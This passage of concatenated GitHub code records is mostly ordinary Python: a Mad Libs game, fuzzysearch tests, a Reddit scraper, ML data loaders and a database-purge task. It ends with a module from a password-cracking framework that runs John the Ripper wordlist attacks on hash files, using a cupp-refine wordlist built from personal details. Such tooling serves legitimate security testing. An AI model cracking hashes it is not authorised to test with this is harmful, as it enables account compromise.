Please enter a new Title\")\n print(f\"{bcolors.WHITE}\")\n self.title = input()\n continue\n try:\n new_madlib_file = open(os.path.abspath(os.path.join(os.getcwd(), \"..\", \"MadLibs\", f\"{self.title}.txt\")), 'x')\n new_madlib_file.write(self.mad_lib)\n new_madlib_file.close()\n title_valid = True\n except IOError:\n print(f\"{bcolors.FAIL}Error: Madlib name is already taken. Please enter a new Title\")\n print(f\"{bcolors.WHITE}\")\n self.title = input()\n\n file = open(self.MasterListName, 'a')\n file.write(f\"\\n{self.title}\")\n file.close()\n\n @staticmethod\n def confirm_done():\n print(f\"{bcolors.WARNING}Are you sure that you are done inputting your mad lib? (Y/N)\")\n print(f\"{bcolors.WHITE}\")\n done = input().lower()\n if done in [\"y\", \"yes\", \"yep\"]:\n return True\n return False\n\n def start_keyboard_listener(self):\n self.listener = keyboard.Listener(\n on_release=self.on_release)\n self.listener.start()\n\n def ask_play_made(self):\n os.system('cls')\n print(\"Would you like to play the Mad Lib that was just created? (Y/N)\")\n answer = input().lower()\n if answer in [\"y\", \"yes\", \"yep\"]:\n play = Play()\n play.start_specific(self.title)\n","repo_name":"hudkinsnoah/Mad-Libs","sub_path":"src/Create.py","file_name":"Create.py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"16029015841","text":"from fuzzysearch.common import group_matches, Match, get_best_match_in_group, \\\n count_differences_with_maximum, consolidate_overlapping_matches\nfrom fuzzysearch.substitutions_only import \\\n has_near_match_substitutions as hnm_subs, \\\n find_near_matches_substitutions as fnm_subs, \\\n find_near_matches_substitutions_lp as fnm_subs_lp, \\\n has_near_match_substitutions_lp as hnm_subs_lp, \\\n find_near_matches_substitutions_ngrams as fnm_subs_ngrams, \\\n has_near_match_substitutions_ngrams as hnm_subs_ngrams\n\nfrom tests.compat import b, u, unittest\nfrom tests.utils import skip_if_arguments_arent_byteslike\n\n\nclass TestSubstitionsOnlyBase(object):\n def search(self, subsequence, sequence, max_subs):\n raise NotImplementedError\n\n def expectedOutcomes(self, search_result, expected_outcomes, *args, **kwargs):\n raise NotImplementedError\n\n def test_empty_sequence(self):\n self.expectedOutcomes(self.search(b('PATTERN'), b(''), max_subs=0), [])\n\n def test_empty_subsequence_exeption(self):\n with self.assertRaises(ValueError):\n self.search(b(''), b('TEXT'), max_subs=0)\n\n def test_match_identical_sequence(self):\n self.expectedOutcomes(\n self.search(b('PATTERN'), b('PATTERN'), max_subs=0),\n [Match(start=0, end=len('PATTERN'), dist=0, matched=b('PATTERN'))],\n )\n\n def test_substring(self):\n substring = b('PATTERN')\n text = b('aaaaaaaaaaPATTERNaaaaaaaaa')\n expected_match = Match(start=10, end=17, dist=0, matched=b('PATTERN'))\n\n self.expectedOutcomes(\n self.search(substring, text, max_subs=0),\n [expected_match],\n )\n self.expectedOutcomes(\n self.search(substring, text, max_subs=1),\n [expected_match],\n )\n self.expectedOutcomes(\n self.search(substring, text, max_subs=2),\n [expected_match],\n )\n\n def test_double_first_item(self):\n self.expectedOutcomes(\n self.search(b('def'), b('abcddefg'), max_subs=1),\n [Match(start=4, end=7, dist=0, matched=b('def'))],\n )\n\n self.expectedOutcomes(\n self.search(b('def'), b('abcddefg'), max_subs=2),\n [Match(start=3, end=6, dist=2, matched=b('dde')),\n Match(start=4, end=7, dist=0, matched=b('def'))],\n 
)\n\n def test_two_identical(self):\n self.expectedOutcomes(\n self.search(b('abc'), b('abcabc'), max_subs=1),\n [Match(start=0, end=3, dist=0, matched=b('abc')),\n Match(start=3, end=6, dist=0, matched=b('abc'))],\n )\n\n self.expectedOutcomes(\n self.search(b('abc'), b('abcXabc'), max_subs=1),\n [Match(start=0, end=3, dist=0, matched=b('abc')),\n Match(start=4, end=7, dist=0, matched=b('abc'))],\n )\n\n def test_one_changed_in_middle(self):\n substring = b('abcdefg')\n pattern = b('abcXefg')\n expected_match = Match(start=0, end=7, dist=1, matched=pattern)\n\n self.expectedOutcomes(\n self.search(substring, pattern, max_subs=0),\n [],\n )\n\n self.expectedOutcomes(\n self.search(substring, pattern, max_subs=1),\n [expected_match],\n )\n\n self.expectedOutcomes(\n self.search(substring, pattern, max_subs=2),\n [expected_match],\n )\n\n def test_one_missing_in_middle(self):\n substring = b('PATTERN')\n text = b('aaaaaaaaaaPATERNaaaaaaaaa')\n\n for max_subs in [0, 1, 2]:\n self.expectedOutcomes(\n self.search(substring, text, max_subs=max_subs),\n [],\n )\n\n def test_one_changed_in_middle2(self):\n substring = b('PATTERN')\n text = b('aaaaaaaaaaPATtERNaaaaaaaaa')\n expected_match = Match(start=10, end=17, dist=1, matched=b('PATtERN'))\n\n self.expectedOutcomes(\n self.search(substring, text, max_subs=0),\n [],\n )\n self.expectedOutcomes(\n self.search(substring, text, max_subs=1),\n [expected_match],\n )\n self.expectedOutcomes(\n self.search(substring, text, max_subs=2),\n [expected_match],\n )\n\n def test_one_extra_in_middle(self):\n substring = b('PATTERN')\n text = b('aaaaaaaaaaPATTXERNaaaaaaaaa')\n\n for max_subs in [0, 1, 2]:\n self.expectedOutcomes(\n self.search(substring, text, max_subs=max_subs),\n [],\n )\n\n def test_all_different(self):\n substring = b('AAAA')\n text = b('ZZZZ')\n\n for max_subs in [0, 1, 2, 3]:\n self.expectedOutcomes(\n self.search(substring, text, max_subs=max_subs),\n [],\n )\n\n for max_subs in [4, 5]:\n self.expectedOutcomes(\n self.search(substring, text, max_subs=max_subs),\n [Match(start=0, end=4, dist=4, matched=b('ZZZZ'))],\n )\n\n def test_dna_search(self):\n # see: http://stackoverflow.com/questions/19725127/\n text = b(''.join('''\\\n GACTAGCACTGTAGGGATAACAATTTCACACAGGTGGACAATTACATTGAAAATCACAGATTGGT\n CACACACACATTGGACATACATAGAAACACACACACATACATTAGATACGAACATAGAAACACAC\n ATTAGACGCGTACATAGACACAAACACATTGACAGGCAGTTCAGATGATGACGCCCGACTGATAC\n TCGCGTAGTCGTGGGAGGCAAGGCACACAGGGGATAGG\n '''.split()))\n pattern = b('TGCACTGTAGGGATAACAAT')\n\n self.expectedOutcomes(\n self.search(pattern, text, max_subs=2),\n [Match(start=4, end=24, dist=1, matched=text[4:24])],\n )\n\n def test_protein_search1(self):\n # see:\n # * BioPython archives from March 14th, 2014\n # http://lists.open-bio.org/pipermail/biopython/2014-March/009030.html\n # * https://github.com/taleinat/fuzzysearch/issues/3\n text = b(''.join('''\\\n XXXXXXXXXXXXXXXXXXXGGGTTVTTSSAAAAAAAAAAAAAGGGTTLTTSSAAAAAAAAAAAA\n AAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBGGGTTLTTSS\n '''.split()))\n pattern = b(\"GGGTTLTTSS\")\n\n self.expectedOutcomes(\n self.search(pattern, text, max_subs=0),\n [Match(start=42, end=52, dist=0, matched=text[42:52]),\n Match(start=99, end=109, dist=0, matched=text[99:109])],\n )\n\n self.expectedOutcomes(\n self.search(pattern, text, max_subs=1),\n [Match(start=19, end=29, dist=1, matched=text[19:29]),\n Match(start=42, end=52, dist=0, matched=text[42:52]),\n Match(start=99, end=109, dist=0, matched=text[99:109])],\n )\n\n self.expectedOutcomes(\n self.search(pattern, text, 
max_subs=2),\n [Match(start=19, end=29, dist=1, matched=text[19:29]),\n Match(start=42, end=52, dist=0, matched=text[42:52]),\n Match(start=99, end=109, dist=0, matched=text[99:109])],\n )\n\n def test_protein_search2(self):\n # see:\n # * BioPython archives from March 14th, 2014\n # http://lists.open-bio.org/pipermail/biopython/2014-March/009030.html\n # * https://github.com/taleinat/fuzzysearch/issues/3\n text = b(''.join('''\\\n XXXXXXXXXXXXXXXXXXXGGGTTVTTSSAAAAAAAAAAAAAGGGTTVTTSSAAAAAAAAAAA\n AAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBGGGTTLTTSS\n '''.split()))\n pattern = b(\"GGGTTLTTSS\")\n\n self.expectedOutcomes(\n self.search(pattern, text, max_subs=0),\n [Match(start=99, end=109, dist=0, matched=text[99:109])],\n )\n\n self.expectedOutcomes(\n self.search(pattern, text, max_subs=1),\n [Match(start=19, end=29, dist=1, matched=text[19:29]),\n Match(start=42, end=52, dist=1, matched=text[42:52]),\n Match(start=99, end=109, dist=0, matched=text[99:109])],\n )\n\n self.expectedOutcomes(\n self.search(pattern, text, max_subs=2),\n [Match(start=19, end=29, dist=1, matched=text[19:29]),\n Match(start=42, end=52, dist=1, matched=text[42:52]),\n Match(start=99, end=109, dist=0, matched=text[99:109])],\n )\n\n def test_missing_at_beginning(self):\n self.expectedOutcomes(\n self.search(b(\"ATTEST\"), b(\"TESTOSTERONE\"), max_subs=2),\n [],\n )\n\n def test_unicode_substring(self):\n pattern = u('\\u03A3\\u0393')\n text = u('\\u03A0\\u03A3\\u0393\\u0394')\n self.expectedOutcomes(\n self.search(pattern, text, max_subs=0),\n [Match(1, 3, 0, matched=text[1:3])]\n )\n\n def test_max_substitutions_gte_subseq_len(self):\n for max_subs in [1, 2, 5]:\n self.expectedOutcomes(\n self.search(b('b'), b('abc'), max_subs),\n [Match(0, 1, 1, b('a')),\n Match(1, 2, 0, b('b')),\n Match(2, 3, 1, b('c'))]\n )\n for extra_subs in [0, 1, 7]:\n self.expectedOutcomes(\n self.search(b('PATTERN'), b('PATTERN'), len('PATTERN') + extra_subs),\n [Match(0, len('PATTERN'), 0, b('PATTERN'))]\n )\n\n\nclass TestFindNearMatchesSubstitions(TestSubstitionsOnlyBase,\n unittest.TestCase):\n def search(self, subsequence, sequence, max_subs):\n return fnm_subs(subsequence, sequence, max_subs)\n\n def expectedOutcomes(self, search_results, expected_outcomes, *args, **kwargs):\n best_from_grouped_results = [\n get_best_match_in_group(group)\n for group in group_matches(search_results)\n ]\n best_from_grouped_exepected_outcomes = [\n get_best_match_in_group(group)\n for group in group_matches(expected_outcomes)\n ]\n return self.assertEqual(best_from_grouped_results,\n best_from_grouped_exepected_outcomes,\n *args, **kwargs)\n\n\nclass TestFindNearMatchesSubstitionsLinearProgramming(TestSubstitionsOnlyBase,\n unittest.TestCase):\n def search(self, subsequence, sequence, max_subs):\n return list(fnm_subs_lp(subsequence, sequence, max_subs))\n\n def expectedOutcomes(self, search_results, expected_outcomes, *args, **kwargs):\n return self.assertEqual(search_results, expected_outcomes, *args, **kwargs)\n\n\nclass TestFindNearMatchesSubstitionsNgrams(TestSubstitionsOnlyBase,\n unittest.TestCase):\n def search(self, subsequence, sequence, max_subs):\n if max_subs >= len(subsequence):\n self.skipTest(\"avoiding calling fnm_subs_ngrams() \" +\n \"with max_subs >= len(subsequence)\")\n return fnm_subs_ngrams(subsequence, sequence, max_subs)\n\n def expectedOutcomes(self, search_results, expected_outcomes, *args, **kwargs):\n return self.assertEqual(\n consolidate_overlapping_matches(search_results),\n 
consolidate_overlapping_matches(expected_outcomes),\n *args, **kwargs)\n\n\nclass TestHasNearMatchSubstitionsOnlyBase(TestSubstitionsOnlyBase):\n def search(self, subsequence, sequence, max_subs):\n raise NotImplementedError\n\n def expectedOutcomes(self, search_results, expected_outcomes, *args, **kwargs):\n return self.assertEqual(bool(search_results),\n bool(expected_outcomes),\n *args, **kwargs)\n\n\nclass TestHasNearMatchSubstitionsOnly(TestHasNearMatchSubstitionsOnlyBase,\n unittest.TestCase):\n def search(self, subsequence, sequence, max_subs):\n return hnm_subs(subsequence, sequence, max_subs)\n\n\nclass TestHasNearMatchSubstitionsOnlyNgrams(TestHasNearMatchSubstitionsOnlyBase,\n unittest.TestCase):\n def search(self, subsequence, sequence, max_subs):\n if max_subs >= len(subsequence):\n self.skipTest(\"avoiding calling hnm_subs_ngrams() \" +\n \"with max_subs >= len(subsequence)\")\n return hnm_subs_ngrams(subsequence, sequence, max_subs)\n\n\nclass TestHasNearMatchSubstitionsOnlyLp(TestHasNearMatchSubstitionsOnlyBase,\n unittest.TestCase):\n def search(self, subsequence, sequence, max_subs):\n return hnm_subs_lp(subsequence, sequence, max_subs)\n\n\ntry:\n from fuzzysearch._substitutions_only import \\\n substitutions_only_has_near_matches_lp_byteslike as \\\n hnm_subs_lp_byteslike, \\\n substitutions_only_find_near_matches_lp_byteslike as \\\n fnm_subs_lp_byteslike, \\\n substitutions_only_has_near_matches_ngrams_byteslike as \\\n hnm_subs_ngrams_byteslike, \\\n substitutions_only_find_near_matches_ngrams_byteslike as \\\n fnm_subs_ngrams_byteslike\nexcept ImportError:\n pass\nelse:\n class TestHasNearMatchesSubstitionsLpByteslike(\n TestHasNearMatchSubstitionsOnlyBase,\n unittest.TestCase\n ):\n @skip_if_arguments_arent_byteslike\n def search(self, subsequence, sequence, max_subs):\n return hnm_subs_lp_byteslike(subsequence, sequence,\n max_subs)\n\n class TestHasNearMatchesSubstitionsNgramsByteslike(\n TestHasNearMatchSubstitionsOnlyBase,\n unittest.TestCase\n ):\n @skip_if_arguments_arent_byteslike\n def search(self, subsequence, sequence, max_subs):\n if max_subs >= len(subsequence):\n self.skipTest(\"avoiding calling hnm_subs_ngrams_byteslike() \" +\n \"with max_subs >= len(subsequence)\")\n return hnm_subs_ngrams_byteslike(subsequence, sequence,\n max_subs)\n\n class TestFindNearMatchesSubstitionsLpByteslike(\n TestSubstitionsOnlyBase,\n unittest.TestCase\n ):\n @skip_if_arguments_arent_byteslike\n def search(self, subsequence, sequence, max_subs):\n results = fnm_subs_lp_byteslike(subsequence, sequence,\n max_subs)\n matches = [\n Match(\n index,\n index + len(subsequence),\n count_differences_with_maximum(\n sequence[index:index+len(subsequence)],\n subsequence,\n max_subs + 1,\n ),\n matched=sequence[index:index+len(subsequence)]\n )\n for index in results\n ]\n return matches\n\n def expectedOutcomes(self, search_results, expected_outcomes,\n *args, **kwargs):\n return self.assertEqual(search_results, expected_outcomes,\n *args, **kwargs)\n\n class TestFindNearMatchesSubstitionsNgramsByteslike(\n TestSubstitionsOnlyBase,\n unittest.TestCase\n ):\n @skip_if_arguments_arent_byteslike\n def search(self, subsequence, sequence, max_subs):\n results = fnm_subs_ngrams_byteslike(subsequence, sequence,\n max_subs)\n matches = [\n Match(\n index,\n index + len(subsequence),\n count_differences_with_maximum(\n sequence[index:index+len(subsequence)],\n subsequence,\n max_subs + 1,\n ),\n matched=sequence[index:index+len(subsequence)]\n )\n for index in results\n ]\n return [\n 
get_best_match_in_group(group)\n for group in group_matches(matches)\n ]\n\n def expectedOutcomes(self, search_results, expected_outcomes, *args, **kwargs):\n return self.assertEqual(\n consolidate_overlapping_matches(search_results),\n consolidate_overlapping_matches(expected_outcomes),\n *args, **kwargs)\n","repo_name":"taleinat/fuzzysearch","sub_path":"tests/test_substitutions_only.py","file_name":"test_substitutions_only.py","file_ext":"py","file_size_in_byte":16224,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"92"} +{"seq_id":"25515139273","text":"__author__ = 'GastonLucero'\r\n\r\nfrom clases.Reader import Reader\r\n\r\n\r\ndef main():\r\n try:\r\n file_name = 'data.json'\r\n file_path = Reader.get_data_file_path(file_name)\r\n Reader.load_json_from_file(file_path)\r\n print('Valid Json file.')\r\n return 1\r\n\r\n except Exception as e:\r\n print('INVALID Json file.')\r\n return 0\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"sanmope/btcviewer","sub_path":"run_validate_file.py","file_name":"run_validate_file.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"8170611240","text":"from logical.models import Database\nfrom system.models import Configuration\nfrom datetime import date, timedelta\nfrom dbaas.celery import app\nfrom util.decorators import only_one\nfrom simple_audit.models import AuditRequest\nfrom notification.models import TaskHistory\nfrom account.models import AccountUser\nimport logging\n\nLOG = logging.getLogger(__name__)\n\n\n@app.task(bind=True)\n@only_one(key=\"purgequarantinekey\", timeout=1000)\ndef purge_quarantine(self,):\n user = AccountUser.objects.get(username='admin')\n AuditRequest.new_request(\"purge_quarantine\", user, \"localhost\")\n\n try:\n task_history = TaskHistory.register(request=self.request, user=user)\n task_history.relevance = TaskHistory.RELEVANCE_WARNING\n\n LOG.info(\n \"id: {} | task: {} | kwargs: {} | args: {}\".format(\n self.request.id, self.request.task,\n self.request.kwargs, str(self.request.args)\n )\n )\n\n quarantine_time = Configuration.get_by_name_as_int(\n 'quarantine_retention_days'\n )\n quarantine_time_dt = date.today() - timedelta(days=quarantine_time)\n task_history.add_detail(\n \"Quarantine date older than {}\".format(quarantine_time_dt)\n )\n\n databases = Database.objects.filter(\n is_in_quarantine=True, quarantine_dt__lte=quarantine_time_dt\n )\n task_history.add_detail(\n \"Databases to purge: {}\".format(len(databases))\n )\n\n for database in databases:\n task_history.add_detail('Deleting {}...'.format(database), level=2)\n database.destroy(user)\n\n task_history.update_status_for(\n TaskHistory.STATUS_SUCCESS,\n details='Listed databases were destroyed successfully.'\n )\n return\n\n except Exception as e:\n task_history.update_status_for(\n TaskHistory.STATUS_ERROR, details=\"Error\\n{}\".format(e))\n return\n finally:\n AuditRequest.cleanup_request()\n","repo_name":"globocom/database-as-a-service","sub_path":"dbaas/logical/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":356,"dataset":"github-code","pt":"92"} +{"seq_id":"1895492052","text":"import torch\nfrom torch.utils.data import Dataset\nimport torch.nn as nn\nimport numpy as np\nimport pandas as pd\nfrom torchvision import datasets, models\nimport torchvision.transforms as transforms\nimport 
os\nimport torch.nn as nn\nimport matplotlib.image as img\nfrom sklearn.model_selection import train_test_split\nfrom torch.utils.data import DataLoader\n\n\nmeans = np.array([0.485, 0.456, 0.406])\nstd = np.array([0.229, 0.224, 0.225])\n\ntrans = transforms.Compose([transforms.ToPILImage(),\n transforms.ToTensor(),\n transforms.Normalize(means, std),\n transforms.Resize([150, 150]),\n transforms.RandomRotation(90)])\npr_trans = transforms.Compose([transforms.ToPILImage(),\n transforms.ToTensor(),\n transforms.Normalize(means, std),\n transforms.Resize([150, 150])])\n\ndef train_info_load(path):\n images = []\n labels = []\n cr_dir = os.getcwd()\n for dirname, _, filenames in os.walk(os.path.join(cr_dir, path)):\n for filename in filenames:\n images.append(filename)\n if filename.find('all') != -1:\n labels.append(1)\n elif filename.find('hem') != -1:\n labels.append(0)\n\n info = pd.DataFrame({'images': images, 'labels': labels})\n return info\n\n\ndef test_info_load(path, filename):\n cr_dir = os.getcwd()\n info = pd.read_csv(os.path.join(cr_dir, path, filename))\n info = info.drop('Patient_ID', axis=1)\n info.columns = ['images', 'labels']\n return info\n\n\nclass AllDataset(Dataset):\n def __init__(self, data, path, transform=None):\n super().__init__()\n self.data = data.values\n self.path = path\n self.transform = transform\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_name, label = self.data[index]\n img_path = os.path.join(self.path, img_name)\n image = img.imread(img_path)\n if self.transform is not None:\n image = self.transform(image)\n return image, label\n\n\ndef dataset_prepare(train_info, test_info, train_path, test_path):\n train, valid = train_test_split(train_info, stratify=train_info.labels, test_size=0.33)\n train_data = AllDataset(train, train_path, trans)\n valid_data = AllDataset(valid, train_path, trans)\n test_data = AllDataset(test_info, test_path, trans)\n return train_data, valid_data, test_data\n\n\nclass Predicted(Dataset):\n def __init__(self, path, transform=None):\n super().__init__()\n self.path = path\n self.transform = transform\n\n def __len__(self):\n return 1\n\n def __getitem__(self, index):\n img_path= self.path\n image = img.imread(img_path)\n if self.transform is not None:\n image = self.transform(image)\n return image\n\n\ndef prediction_data(image):\n return DataLoader(dataset=Predicted(image, pr_trans), batch_size=1)\n","repo_name":"Rumotameru/NNet","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4083002740","text":"import random\n\nimport matplotlib.pyplot as plt\n\nfrom lib.machine_learning import knn\nfrom lib.stat import randstat\n\n\n# Zip to list of lists\ndef listzip(x, y):\n return [list(it) for it in zip(x, y)]\n\nrandstat.init()\nN_POINT = 100\nCOLORS = ['red', 'green']\n\nx = [random.uniform(-1, 1) for i in range(0, N_POINT)]\ny = [random.uniform(-1, 1) for i in range(0, N_POINT)]\nt = [COLORS[random.randint(0,1)] for i in range(0, N_POINT)]\nvList = listzip(x,y)\np = [0.5, 0.3]\n\nknn.knn(vList, t, p, 1)\nknn.knn(vList, t, p, 2)\nknn.knn(vList, t, p, 3)\nknn.knn(vList, t, p, 4)\nknn.knn(vList, t, p, 5)\nknn.maxEField(vList, t, p)\n\nplt.scatter(x,y, 
color=t)\nplt.show()\n\n","repo_name":"aleksejs-fomins/snippets-data-analysis","sub_path":"inference-parametric/machine_learning/UnsupervisedLearning/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"16068343561","text":"\nimport os\nimport os.path as path\nimport calendar\nimport json\nimport time\nimport math\nimport signal\nimport errno\n\nstop_loops = False\n\ndef sigint_handler(signum, frame):\n\t# flag the loops below to stop at the next safe point\n\tglobal stop_loops\n\tstop_loops = True\nsignal.signal(signal.SIGINT, sigint_handler)\n\ndef findTotalLoopsRequired(startTime, endTime, num_days_per_loop):\n\tdiff = endTime - startTime\n\treturn math.ceil(diff / getDaysInSeconds(num_days_per_loop))\n\ndef addComments(reddit, posts, output, filename):\n\t\"\"\"\n\tGo through each postId in the posts and get an array of comments\n\tfor this post.\n\t\"\"\"\n\n\tprint('\\n Now adding comments to ' + filename)\n\tnum_posts = len(posts.keys())\n\n\tfor idx, postId in enumerate(posts.keys()):\n\t\tif (stop_loops):\n\t\t\tprint('exiting')\n\t\t\twriteToFile(posts, output)\n\t\t\toutput.close()\n\t\t\tbreak\n\n\t\tprint('On post {0} out of {1}.'.format(idx+1, num_posts))\n\t\tif (posts[postId]['comments'] and len(posts[postId]['comments']) > 0):\n\t\t\tprint('Skipping this post, already done')\n\t\t\tcontinue\n\n\t\tsubmission = reddit.submission(id=postId)\n\t\tsubmission.comments.replace_more(limit=None)\n\t\tall_comments = submission.comments.list()\n\n\t\tall_comments_text = []\n\t\tfor comment in all_comments:\n\t\t\tall_comments_text.append(comment.body)\n\t\tposts[postId]['comments'] = all_comments_text\n\n\t\tprint('Added comments to this post, sleeping now')\n\t\ttime.sleep(2)\n\n\t\tif (idx > 0 and idx % 5 == 0):\n\t\t\tprint('Writing to file')\n\t\t\twriteToFile(posts, output)\n\n\twriteToFile(posts, output)\n\ndef addPosts(subreddit, startTime, endTime, posts, output, filename, num_days=2):\n\t\"\"\"\n\tAdd all of the posts between the startTime and endTime\n\tReturns the posts dictionary with all of the posts\n\t\"\"\"\n\n\tprint('Now adding posts to ' + filename)\n\n\tstartTimeLoop = getLatestPostEntry(posts, startTime)\n\tendTimeLoop = min([startTimeLoop + getDaysInSeconds(num_days), endTime])\n\tloopNum = 1\n\ttotal_loops_required = findTotalLoopsRequired(startTimeLoop, endTime, num_days)\n\n\twhile(startTimeLoop < endTime):\n\t\tif (stop_loops):\n\t\t\tprint('exiting')\n\t\t\twriteToFile(posts, output)\n\t\t\toutput.close()\n\t\t\tbreak\n\t\tprint('On loop {0} out of {1} in adding posts'.format(loopNum, total_loops_required))\n\t\ttry:\n\t\t\tfor submission in subreddit.submissions(startTimeLoop, endTimeLoop):\n\t\t\t\tposts[submission.id] = {}\n\t\t\t\tposts[submission.id]['created'] = submission.created\n\t\t\t\tposts[submission.id]['comments'] = []\n\t\t\twriteToFile(posts, output)\n\t\t\tstartTimeLoop = endTimeLoop\n\t\t\tendTimeLoop = min([endTimeLoop + getDaysInSeconds(num_days), endTime])\n\t\t\tloopNum += 1\n\t\texcept Exception as error:\n\t\t\tprint('Received an error, trying again next loop')\n\n\n\t# return the final posts dict in case this is needed\n\treturn posts\n\n\ndef createFolder(foldername):\n\t\"\"\"\n\tWill create this folder if it does not exist at the moment\n\t\"\"\"\n\tif (path.exists(foldername)):\n\t\treturn\n\ttry:\n\t\tos.makedirs(foldername)\n\texcept OSError as err: \n\t\tif err.errno != errno.EEXIST:\n\t\t\traise\n\ndef getDaysInSeconds(days):\n\treturn 60 * 60 * 24 * days\n\ndef getFileContent(filename):\n\tcontent = 
None\n\tif path.exists(filename):\n\t\tf = open(filename, 'r', encoding='utf-8')\n\t\tcontent = f.read()\n\t\tf.close()\n\treturn content\n\ndef getLatestPostEntry(posts, startTime):\n\t\"\"\"\n\tWill find the latest timestamp given a dictionary of posts\n\tEnsure that the posts dictionary exists\n\t\"\"\"\n\tif (posts is None or len(posts.keys()) == 0):\n\t\t# nothing scraped yet, so resume from the requested start time\n\t\treturn startTime\n\n\tlatestCreatedTime = startTime\n\tfor postId in posts.keys():\n\t\tcreatedTime = posts[postId]['created']\n\t\tif (createdTime > latestCreatedTime):\n\t\t\tlatestCreatedTime = createdTime\n\n\treturn latestCreatedTime\n\ndef writeToFile(posts, fp):\n\tfp.seek(0) # write to beginning\n\tjson.dump(posts, fp)\n\tfp.truncate() # drop stale trailing data if the new JSON is shorter\n\ndef scrape(subreddit, startTime, reddit, endTime=None, filename=None, foldername=None, quiet=1):\n\t\"\"\"\n\tMain scrape function, get all posts first, do so one week at\n\ta time. At the start of each iteration go from the first one that\n\thas no comment values, in case the last iteration failed.\n\tThen go through one post every 2 seconds\n\t\"\"\"\n\n\t# set filename if not provided\n\tif (filename is None):\n\t\tfilename = subreddit + '_comments'\n\tfilename += '.json'\n\n\t# set endTime to current if not provided\n\tif (endTime is None):\n\t\tendTime = calendar.timegm(time.gmtime())\n\n\t# prepend foldername if one was given\n\tif (foldername):\n\t\tfilename = foldername + '/' + filename\n\t\tcreateFolder(foldername)\n\n\t# get all the post comments if any exist at the moment\n\tposts_str = getFileContent(filename)\n\tposts = {}\n\tif (posts_str is not None and len(posts_str) > 0):\n\t\tposts = json.loads(posts_str)\n\n\t# out file for writing\n\toutput = None\n\tif (path.exists(filename)):\n\t\toutput = open(filename, 'r+', encoding='utf-8') # don't destroy file\n\telse:\n\t\toutput = open(filename, 'w', encoding='utf-8')\n\n\t# subreddit instance\n\tsubreddit = reddit.subreddit(subreddit)\n\n\t# add all of the posts to the file\n\taddPosts(subreddit, startTime, endTime, posts, output, filename)\n\tprint('Added all posts')\n\n\t# add comments now that we've added all possible posts\n\taddComments(reddit, posts, output, filename)\n\tprint('Added all comments')\n\n\t# close the output file\n\toutput.close()","repo_name":"djamrozik/datalok_projects","sub_path":"subreddit_book_recommender/subreddit_all_comments.py","file_name":"subreddit_all_comments.py","file_ext":"py","file_size_in_byte":5003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"40562899830","text":"import streamlit as st\nfrom modeling_dl import serve_model_dl\nfrom modeling_non_dl import serve_model_non_dl\n\n\ndef process_sentence(input_sentence):\n    dl = serve_model_dl(model_path='models/model-dl.pth', vocab_path='models/vocab.pkl', sentence=input_sentence)\n    nondl = serve_model_non_dl(model_path='models/model-lr.pkl', vec_path='models/vec.pkl', sentence=input_sentence)\n    return dl, nondl\n\n\ndef main():\n    st.title(\"Sentence Processor\")\n    input_sentence = st.text_input(\"Enter a sentence:\")\n\n    if st.button(\"Predict\"):\n        if input_sentence:\n            dl, nondl = process_sentence(input_sentence)\n            st.write(f'results from deep learning model: {dl}')\n            st.write(f'results from non deep learning model: {nondl}')\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"yiboliu/AIPI540-NLP","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} 
+{"seq_id":"33931619435","text":"#!/usr/bin/env python3\n#\n# wordlist attack using john with cupp-refine as pre attack module\n#\n# date: Mar 30 2021\n# Maintainer: glozanoa <glozanoa@uni.pe>\n\nfrom typing import Any\n\nfrom ..john_wordlist import JohnWordlist\nfrom ama.core.modules.auxiliary.wordlists import CuppRefine\n\n# cracker imports\nfrom ama.core.plugins.cracker import John\n\n# slurm import\nfrom ama.core.slurm import Slurm\n\n#fineprint status\nfrom fineprint.status import (\n print_failure,\n print_status\n)\n\n\n# name format: PREATTACK_ATTACK_POSTATTACK\n# (if pre/post attack is null then _ replace its name)\nclass CuppRefine_JohnWordlist__(JohnWordlist):\n def __init__(self, init_options = None):\n\n if init_options is None:\n init_options = {\n \"pre_attack\": CuppRefine(),\n \"post_attack\": None\n }\n\n super().__init__(**init_options)\n self.options['wordlist'].required = False\n self.fulldescription = (\n \"\"\"\n Perform wordlists attacks against hashes\n with john using the refine wordlist generated by cupp-refine,\n also this parallel task can be submited in a cluster using Slurm\n \"\"\"\n )\n\n # pre attack options\n # if self.selected_pre_attack:\n # self.selected_pre_attack.options['wordlist'].value = self.options['wordlist'].value\n\n # preattack output format: {hash: [POSIBLE_IDENTITIES, ...], ...}\n def attack(self, local:bool = False, force: bool = False, pre_attack_output: Any = None):\n \"\"\"\n Wordlist attack using John the Ripper with cupp-interactive as pre attack module\n\n Args:\n local (bool): if local is True run attack localy otherwise\n submiting parallel tasks in a cluster using slurm\n \"\"\"\n #import pdb; pdb.set_trace()\n try:\n if not force:\n self.no_empty_required_options(local)\n\n jtr = John()\n\n refined_wordlist = pre_attack_output\n hash_types = self.options['hash_type'].value.split(',')\n jtr.wordlist_attack(hash_types = hash_types,\n hashes_file = self.options['hashes_file'].value,\n wordlist = refined_wordlist,\n slurm = self.slurm,\n local = local)\n\n except Exception as error:\n print_failure(error)\n\n def setv(self, option, value, *, pre_attack: bool = False, post_attack: bool = False):\n #import pdb; pdb.set_trace()\n super().setv(option, value, pre_attack = pre_attack, post_attack 